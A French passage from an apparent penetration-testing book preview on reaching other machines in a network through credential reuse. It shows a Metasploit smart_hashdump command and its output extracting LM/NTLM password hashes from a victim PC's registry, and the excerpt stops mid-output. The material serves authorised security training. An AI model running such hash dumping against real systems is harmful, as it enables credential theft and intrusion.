Accès à d’autres machines du réseau Réseau:accès à d’autres machines

Dans le cas où le périmètre des tests le permet, il est possible de tenter d’accéder à d’autres machines du réseau.

Comme vu à la section Élévation des privilèges - À la recherche de fichiers intéressants, il est possible de trouver des informations sensibles au sein de certains fichiers. Néanmoins, d’autres techniques existent.

1. Réutilisation des identifiants

Nous avons vu qu’il est possible d’obtenir les hashs des identifiants LM/NTLM grâce aux commandes hashdump et smart_hashdump de Meterpreter : hashdump

msf6 post(windows/gather/smart_hashdump) > exploit  
[*] Running module against VICTIMEPC 
[*] Hashes will be saved to the database if one is connected. 
[+] Hashes will be saved in loot in JtR password file format to: 
[*] 
/root/.msf4/loot/20190618081455_default_192.168.0.29_windows.hashes_3 
08038.txt  
[*] Dumping password hashes... 
[*] Running as SYSTEM extracting hashes from registry 
[*]     Obtaining the boot key... 
[*]     Calculating the hboot key using SYSKEY 
073e3c624e24966502b500cba1fdeb0a... 
[*]     Obtaining the user list and keys... 
[*]     Decrypting user keys... 
[*]     Dumping password...
EP2METAS_max.jpg

Découvrez 

le livre :

Aussi inclus dans nos :

Précédent
Enregistrement des frappes clavier
Suivant
Les attaques sur les mots de passe